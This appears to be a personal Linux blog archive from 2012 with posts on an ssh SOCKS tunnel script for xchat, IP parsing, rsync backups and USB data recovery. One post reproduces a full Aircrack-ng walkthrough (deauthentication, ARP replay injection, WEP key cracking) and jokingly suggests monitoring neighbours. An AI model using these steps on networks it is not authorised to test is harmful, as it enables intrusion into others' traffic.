Connecting to an IRC server behind a firewall? I feel your pain!

September 29, 2012

So I use Xchat daily and connect to a private IRC server to talk with my colleagues. I also have a BIP server in the office to record all of the IRC transcripts, so I never miss any conversations regardless of the time of day. Because the BIP server is behind a firewall on the company’s network, I can’t access it from the outside. For the past year I’ve been working around this by connecting to my company’s firewall via ssh, creating a SOCKS tunnel, and then simply directing xchat to talk through my local SOCKS proxy.

To do this, open a terminal and issue:

ssh -CND <LOCAL_IP_ADDRESS>:<PORT> <USER>@<SSH HOST>

Ex: ssh -CND 192.168.1.44:9999 sfeole@companyfirewall.com

Starting ssh with -CND:

‘D’ specifies local “dynamic” application-level port forwarding: ssh allocates a socket that listens on the given port on the local side, optionally bound to the specified bind_address, and acts as a SOCKS server on it. ‘C’ adds compression to the data stream, and ‘N’ tells ssh not to execute a remote command, so the session only forwards ports.

192.168.1.44 is my IPv4 address. Because the tunnel is bound to that address rather than to 127.0.0.1, the SOCKS port is also reachable from other machines on the same network.

9999 is the local port I’m going to open and direct traffic through.

After the SSH tunnel is open I now need to launch xchat, navigate to Settings -> Preferences -> Network Setup and configure xchat to use my local IP (192.168.1.44) and local port (9999) then press OK then Reconnect.

I should now be able to connect to the IRC server behind the firewall. Usually I run through this process a few times a day, so it becomes somewhat of a tedious annoyance after a while.

Recently I finished a cool python3 script that does all of this in one quick command.

The script does the following:

1.) identify the ipv4 address of the interface device you specify

2.) configure xchat.conf to use the new ipv4 address and port specified by the user

3.) open the ssh tunnel using the SSH -CND command from above

4.) launch xchat and connect to your server (assuming you have it set to auto connect)

To use it simply run

$./xchat.py -i <interface> -p <port>

ex: $./xchat.py -i wlan0 -p 9999

The user can select wlan0 or eth0 and, of course, their desired port. When you’re done with the tunnel, simply issue <Ctrl-C> to kill it and voilà!

https://code.launchpad.net/~sfeole/+junk/xchat

#!/usr/bin/env python3
#Sean Feole 2012,
#
#xchat proxy wrapper, for those of you that are constantly on the go:
#   --------------  What does it do? ------------------
# Creates a SSH Tunnel to Proxy through and updates your xchat config
# so that the user does not need to muddle with program settings

import signal
import shutil
import sys
import subprocess
import argparse
import re
import time

proxyhost = "myhost.company.com"
proxyuser = "sfeole"
localusername = "sfeole"

def get_net_info(interface):
    """
    Obtains your IPv4 address
    """

    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def configure_xchat_config(Proxy_ipaddress, Proxy_port):
    """
    Reads your current xchat.conf and creates a new one in /tmp
    """

    in_file = open("/home/%s/.xchat2/xchat.conf" % localusername, "r")
    output_file = open("/tmp/xchat.conf", "w")
    for line in in_file.readlines():
        line = re.sub(r'net_proxy_host.+', 'net_proxy_host = %s'
                 % Proxy_ipaddress, line)
        line = re.sub(r'net_proxy_port.+', 'net_proxy_port = %s'
                 % Proxy_port, line)
        output_file.write(line)
    output_file.close()
    in_file.close()
    shutil.copy("/tmp/xchat.conf", "/home/%s/.xchat2/xchat.conf"
                 % localusername)

def ssh_proxy(ProxyAddress, ProxyPort, ProxyUser, ProxyHost):
    """
    Create SSH Tunnel and Launch Xchat
    """

    ssh_address = "%s:%i" % (ProxyAddress, ProxyPort)
    user_string = "%s@%s" % (ProxyUser, ProxyHost)
    ssh_open = subprocess.Popen(["/usr/bin/ssh", "-CND", ssh_address,
                 user_string], stdout=subprocess.PIPE, stdin=subprocess.PIPE)

    time.sleep(1)
    print ("")
    print ("Kill this tunnel with Ctrl-C")
    time.sleep(2)
    subprocess.call("xchat")
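    # Block until ssh exits instead of spinning on poll(), which pins a CPU core.
    try:
        ssh_open.wait()
    except KeyboardInterrupt:
        # Ctrl-C: make sure the tunnel is torn down before the script exits.
        ssh_open.terminate()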

def main():
    """
    Core Code
    """

    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    parser.add_argument('-p', '--port',
                        help="Select the internal port you wish to bind to",
                        required=True, type=int)
    args = parser.parse_args()

    proxyip = (get_net_info("%s" % args.interface))
    configure_xchat_config(proxyip, args.port)
    print (proxyip, args.port, proxyuser, proxyhost)

    ssh_proxy(proxyip, args.port, proxyuser, proxyhost)

if __name__ == "__main__":
    sys.exit(main())

Refer to the launchpad address above for more info.
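
An added example (not the author's script) of two hardening steps for the wrapper above: binding the SOCKS listener to loopback so that other hosts on the LAN cannot use the tunnel, and rewriting xchat.conf through a private temp file in the same directory instead of the predictable /tmp/xchat.conf. The function names and the sample config (including its irc_nick1 line) are constructed for illustration.

```python
import ipaddress
import os
import re
import tempfile

def socks_forward_argv(port, user, host, bind="127.0.0.1"):
    """Build the ssh argv for a SOCKS tunnel, refusing non-loopback binds."""
    if not ipaddress.ip_address(bind).is_loopback:
        raise ValueError("bind %s would expose the SOCKS port to other hosts" % bind)
    if not 1 <= port <= 65535:
        raise ValueError("invalid port %r" % port)
    # Same options as 'ssh -CND', passed separately.
    return ["/usr/bin/ssh", "-C", "-N", "-D", "%s:%d" % (bind, port),
            "%s@%s" % (user, host)]

def rewrite_proxy_settings(conf_path, host, port):
    """Update net_proxy_host/net_proxy_port and swap the file in atomically."""
    settings = {"net_proxy_host": host, "net_proxy_port": str(port)}
    with open(conf_path) as src:
        lines = src.readlines()
    out = []
    for line in lines:
        m = re.match(r"(net_proxy_host|net_proxy_port)\s*=", line)
        out.append("%s = %s\n" % (m.group(1), settings[m.group(1)]) if m else line)
    # mkstemp creates a 0600 file with an unpredictable name; keeping it in the
    # config's own directory makes os.replace() a same-filesystem atomic rename.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(conf_path)))
    try:
        with os.fdopen(fd, "w") as dst:
            dst.writelines(out)
        os.replace(tmp, conf_path)
    except BaseException:
        os.unlink(tmp)
        raise

def demo():
    """Run both helpers against a constructed xchat.conf in a scratch directory."""
    with tempfile.TemporaryDirectory() as scratch:
        path = os.path.join(scratch, "xchat.conf")
        with open(path, "w") as f:
            f.write("irc_nick1 = sfeole\n"
                    "net_proxy_host = 10.0.0.5\n"
                    "net_proxy_port = 1080\n")
        rewrite_proxy_settings(path, "127.0.0.1", 9999)
        with open(path) as f:
            conf = f.read()
    return conf, socks_forward_argv(9999, "sfeole", "companyfirewall.com")

if __name__ == "__main__":
    new_conf, argv = demo()
    print(new_conf)
    print(" ".join(argv))
```

With a loopback bind the interface lookup is no longer needed, since xchat on the same machine reaches the tunnel at 127.0.0.1.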

Simple Python3 Code to parse your ipaddress

September 27, 2012

I’ve been doing some side projects on my own requiring me to obtain my assigned IPv4 address.  In python3 you can do this by importing socket, which I believe is a better way than how I’m doing it below, however I found that using subprocess solved the issue!

I just put this together tonight and it does exactly what I wanted it to do. Feel free to copy and use it for your own little projects, you will need to add additional logic to the parser for additional network interfaces.

#!/usr/bin/env python3

import sys
import subprocess
import argparse

def get_net_info(interface):
    myaddress = subprocess.getoutput("/sbin/ifconfig %s" % interface)\
                .split("\n")[1].split()[1][5:]
    if myaddress == "CAST":
        print ("Please Confirm that your Network Device is Configured")
        sys.exit()
    else:
        return (myaddress)

def main():
#Parser Code
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface',
                        help="Select the interface you wish to use",
                        choices=['eth0', 'wlan0'],
                        required=True)
    args = parser.parse_args()

#    print ("%s" % args.interface)
    print (get_net_info("%s" % args.interface))

if __name__ == "__main__":
    sys.exit(main())

Here’s the expected output. In the event the device in question is NOT configured (unplugged/unplumbed), the following should output:

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i eth0
Please Confirm that your Network Device is Configured

And here is the expected output when the device is configured (plugged in and plumbed):

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i wlan0
192.168.1.44

And of course, invalid arguments…

sfeole@sfmadmax:~/pythonscript$ ./sean3.py -i www
usage: sean3.py [-h] -i {eth0,wlan0}
sean3.py: error: argument -i/--interface: invalid choice: 'www' (choose from 'eth0', 'wlan0')
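
An added example, not part of the original post: a parser for the ifconfig output that get_net_info() slices by position, shown next to that positional slice so the difference is visible on an unconfigured device, on the newer ifconfig layout and on an unknown interface. The three sample outputs are constructed, and the function names are assumptions.

```python
import ipaddress
import re

# "inet addr:192.168.1.44" (older net-tools) or "inet 192.168.1.44" (newer);
# "inet6" lines do not match because "inet" must be followed by whitespace.
_INET = re.compile(r"^[ \t]*inet[ \t]+(?:addr:)?(\d{1,3}(?:\.\d{1,3}){3})\b", re.M)

# Constructed sample outputs.
OLD_UP = """wlan0     Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          inet addr:192.168.1.44  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1"""
OLD_DOWN = """eth0      Link encap:Ethernet  HWaddr 00:11:22:33:44:66
          UP BROADCAST MULTICAST  MTU:1500  Metric:1"""
NEW_UP = """wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.44  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::1  prefixlen 64  scopeid 0x20<link>"""
MISSING = "www: error fetching interface information: Device not found"

def legacy_slice(output):
    """The positional slice used in the post: line 2, token 2, minus 5 chars."""
    return output.split("\n")[1].split()[1][5:]

def parse_ipv4(output):
    """Return the first IPv4 address in ifconfig output, or None if absent."""
    m = _INET.search(output)
    if not m:
        return None
    try:
        # Reject matches such as 999.1.1.1 that are not valid addresses.
        return str(ipaddress.IPv4Address(m.group(1)))
    except ValueError:
        return None

if __name__ == "__main__":
    for label, sample in (("old/up", OLD_UP), ("old/down", OLD_DOWN),
                          ("new/up", NEW_UP), ("missing", MISSING)):
        try:
            legacy = legacy_slice(sample)
        except IndexError:
            legacy = "IndexError"
        print("%-9s legacy=%-13s regex=%s" % (label, legacy, parse_ipv4(sample)))
```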

Ubuntu 12.10 Amazon Search, HOW TO REMOVE

September 24, 2012

So it’s been quite a long time since my last post. Frankly I’ve been busy with work/personal life, spending time with my little girl and catching up on random chores in and out of the house. Everyone can relate I’m sure.

Well, so new info!! Some of you know that the Ubuntu 12.10 Quantal Quetzal release is right around the corner. I’ve been using it since Beta1 and I have to say it’s coming along nicely. A new feature that has some users in an uproar is the Amazon Search feature in Dash. Whenever searching for new items using the Search Lens the system will now poll results from Amazon.com.

Here’s an example:

I search for Music and note the results from Amazon which populate in as I wait…

To Remove this, Open a Terminal Window <Ctrl-Alt-T>

$sudo apt-get remove unity-lens-shopping

Log out and log back in, then search for MUSIC again.

All Fixed.

Hope this helps!! And enjoy the new 12.10 features!

How to backup all my Windows pics to the Linux box

March 25, 2012

So if you’re like me, then you shoot RAW! I use Adobe Photoshop CS5 and Adobe Lightroom 3.5 for most of my post imaging, which means my photography is mostly saved on a Windows box. So there’s really no “play nice” backup solution. Plus I have about 20 some odd GB of photos, which makes FTP out of the question. What would be ideal is if they made rsync for Windows…. Wait, they do! Check it out here using Cygwin.

So assuming you’re using a file server like Ubuntu, I’ll jot down some instructions so you can do this at home as well!

I’m already guessing that you have rsync installed on your linux box, if not that can be easily fixed by:

#sudo apt-get install rsync

  1. Create a file named rsyncd.conf in /etc
    1. #sudo vi /etc/rsyncd.conf
    2. Add the following to rsyncd.conf, replacing all instances of username with your Ubuntu username:
      [usernamebackup]
      
          path = /home/username/backup
          comment = Backup
          uid = username
          gid = username
          read only = false
          auth users = username
          secrets file = /etc/rsyncd.secrets
    3. #sudo chmod 644 /etc/rsyncd.conf
  2. Create a file named rsyncd.secrets in /etc
    1. #sudo vi /etc/rsyncd.secrets
    2. Add the following to rsyncd.secrets, replacing username with your username and password with a password of your choosing:
      username:password
    3. #sudo chmod 600 /etc/rsyncd.secrets
  3. Open rsync port by editing /etc/default/rsync and setting
    RSYNC_ENABLE=true
  4. Restart rsync
    #sudo /etc/init.d/rsync restart
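
An added example, not part of the original post, that parses an rsyncd.conf like the one above and reports what a writable module still leaves open, plus a permission check on the secrets file. The function names and the sample config text are constructed for illustration; names are normalised by lower-casing and dropping whitespace for lookup.

```python
import stat

FALSY = {"false", "no", "0"}

# Constructed sample: the module from the steps above with a placeholder user.
PAGE_CONF = """\
[usernamebackup]
    path = /home/username/backup
    comment = Backup
    uid = username
    gid = username
    read only = false
    auth users = username
    secrets file = /etc/rsyncd.secrets
"""

def parse_rsyncd_conf(text):
    """Return {module: {param: value}}; global parameters are stored under ''."""
    modules = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules.setdefault(current, {})
        elif "=" in line:
            key, value = line.split("=", 1)
            # Normalise names for lookup: lower-case, whitespace removed.
            modules[current]["".join(key.lower().split())] = value.strip()
    return modules

def audit(text, secrets_mode=None):
    """Return (module, finding) pairs; secrets_mode is os.stat().st_mode if known."""
    conf = parse_rsyncd_conf(text)
    findings = []
    for name, params in conf.items():
        if name == "":
            continue
        def get(key, default=""):
            # Module setting first, then the global section, then the default.
            return params.get(key, conf[""].get(key, default))
        if get("readonly", "true").lower() not in FALSY:
            continue  # read-only modules cannot be written to
        if not get("authusers"):
            findings.append((name, "writable without 'auth users'"))
        elif not get("secretsfile"):
            findings.append((name, "'auth users' set but no 'secrets file'"))
        if not get("hostsallow"):
            findings.append((name, "no 'hosts allow' restriction"))
    if secrets_mode is not None and secrets_mode & stat.S_IRWXO:
        findings.append(("", "secrets file is accessible to other users"))
    return findings

if __name__ == "__main__":
    for module, finding in audit(PAGE_CONF, 0o100600):
        print("%s: %s" % (module or "(global)", finding))
```

To check a live system, pass the contents of /etc/rsyncd.conf and os.stat("/etc/rsyncd.secrets").st_mode; a hosts allow line limiting the module to the Windows client's address clears the remaining finding for the config above.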

Set up rsync client on Windows

  1. Install Cygwin, making sure  Net > rsync (3.0.8) and Net > openssh are selected
  2. Add C:\cygwin\bin; to the Windows PATH statement
    1. Right-click on My Computer and select Properties
    2. Switch to the Advanced tab and click the Environment Variables button at the bottom
    3. Find the “Path” or “PATH” variable in the System variables list at the bottom and click Edit
    4. Add C:\cygwin\bin; to the beginning of the list
  3. Create secret file to store password in Cygwin
      1. Start Cygwin Bash Shell
      2. Create secret file in the filesystem root and enter only the password in rsyncd.secrets above, with no spaces or line breaks
    #vi /secret
    #chmod 600 /secret
  4. Create bat file to run rsync
    1. Open Notepad and enter the following command, replacing User Name with your Windows User Name directory, username with your Ubuntu username, and ipaddress with the IP address of your Ubuntu server (e.g. 192.168.1.35):
      C:\cygwin\bin\rsync.exe --chmod u+rwx -qrtzv --password-file=/secret --delete "/cygdrive/d/photos" username@ipaddress::usernamebackup

      This will copy "/cygdrive/d/photos" to the path specified in the rsyncd.conf.

    2. Save the file as C:\rsync.bat

Now, to kick off a backup, just copy the batch file to your desktop and run it every time you finish your edits. You could also create a scheduled task to execute the batch script daily at midnight; I prefer to just run it manually, as I don’t keep my Linux box or Windows system up 24/7.

Aircrack-NG, monitor wireless traffic on your network, heck… monitor your neighbors ;)

March 8, 2012

So I wanted to show users how to sniff out their local wireless traffic, capture it and decrypt it. However, before I made up a long-winded post I decided to research it and see if someone else had done the work already. Sure enough someone has, so take a look at the following link. The article is geared for identifying wireless security holes and exploiting them. But I’ll let you read the rest. It’s not advanced stuff; you can learn more about aircrack-ng if still interested.

I’ve copied the poster’s contents here, if you don’t want to deal with the link. If you want the screenshots, you’ll have to sign into the forums.

GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:

1. Brute force attack
2. Dictionary attack
3. Statistical attack

By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:

1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)

I recommend “Linksys WUSB54G V4.0” as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.

PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.

COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to the section on MAC filtering.

  • 1. Enable monitoring with “airmon-ng” (screenshot #1):
    Quote:
    sudo airmon-ng start <interface> <channel>
  • 2. Packet capturing with “airodump-ng” (screenshot #2):
    Quote:
    sudo airodump-ng --channel <channel> --write <file_name> <interface>

    Alternatively, try this (to collect data from target network only and hence increase performance):

    Quote:
    sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <file_name> <interface>

    NOTE:
    --channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
    --bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
    --write… Preferred file name; mandatory field (in our case).

  • 3.1. Now check if MAC filtering is enabled or turned off:
    Quote:
    sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    NOTE:
    -1… ‘0’ deauthenticates all clients.
    -e… ESSID of target access point.
    -a… MAC address of target access point.
    -h… MAC address of your choice.

  • 3.2. If the resulting output looks like this…
    Quote:
    18:22:32 Sending Authentication Request
    18:22:32 Authentication successful
    18:22:32 Sending Association Request
    18:22:32 Association successful :-)

    …then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.

>> No MAC filtering <<

  • 4. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).

    Continue with #6.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… MAC address of your choice.

>> MAC filtering <<

  • 4. Deauthentication with “aireplay-ng” (screenshot #3):
    Quote:
    sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>

    NOTE:
    -0… Number of deauthentication attempts.
    -a… MAC address of target access point.
    -c… Client MAC address.

  • 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
    Quote:
    sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>

    You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

    NOTE:
    -3… Standard ARP-request replay.
    -b… MAC address of target access point.
    -h… Client MAC address.

  • 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
    Aircrack-ng:
    Quote:
    sudo aircrack-ng <file_name>.cap

    Aircrack-PTW:

    Quote:
    ./aircrack-ptw <file_name>.cap

CAPTURING:
This is a summary based on information given here and there, respectively:

Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets

Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets

FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.


ARM Hardfloat takes it up a notch in the performance category.

March 8, 2012

http://www.phoronix.com/scan.php?page=article&item=ubuntu_1204_omap4460&num=1

Great article above, it’s looking good for armhf. I’m still waiting for the armhf TI patches for gstreamer/totem (unless they have already been released); I don’t see them on the TI OMAP devel trunk PPA, and I’m pretty sure those are only available for Oneiric still. You can also get them integrated if you just build using linaro tools, assuming you have the correct hwpack and binary.

With the cpufreq support enabled, the dual-core Cortex-A9 can now run as low as 300MHz or ramp up to its highest 1.2GHz frequency stepping when needed. Without the cpufreq support, the SoC is just stuck running at around 1.0GHz. With this support finally enabled for Ubuntu Linux, there is some immediate performance boosts for the PandaBoard ES.

How to retrieve data after experiencing read errors on a USB stick

March 7, 2012

So I figured I’d post this handy piece of info. Ever have to copy data from a USB stick and run into read errors? I just did 😦

So aside from the fact I have some shitty USB keys, I really needed to save the data on this 4GB stick. I was able to retrieve the whole partition using gddrescue. You can grab it from Ubuntu ppa.

sfeole@sfeolework:~$ apt-cache policy gddrescue
gddrescue:
Installed: 1.14-1
Candidate: 1.14-1
Version table:
*** 1.14-1 0
500 http://us.archive.ubuntu.com/ubuntu/ oneiric/universe amd64 Packages
100 /var/lib/dpkg/status

Read more about it here:

http://www.gnu.org/software/ddrescue/ddrescue.html

So by carrying out the following I was able to pull the partition off my USB stick, this copies the data block for block.

sfeole@sfeolework:~$ time sudo ddrescue -r3 -f /dev/sdb my4gusb.img
Press Ctrl-C to interrupt
rescued: 4012 MB, errsize: 0 B, current rate: 18481 kB/s
ipos: 4012 MB, errors: 0, average rate: 17958 kB/s
opos: 4012 MB, time from last successful read: 0 s
Finished

real 3m43.060s
user 0m0.308s
sys 0m13.773s

From here I was able to use a fresh new USB stick and DD my image back.

sfeole@sfeolework:~$dd if=my4gusb.img of=/dev/sdb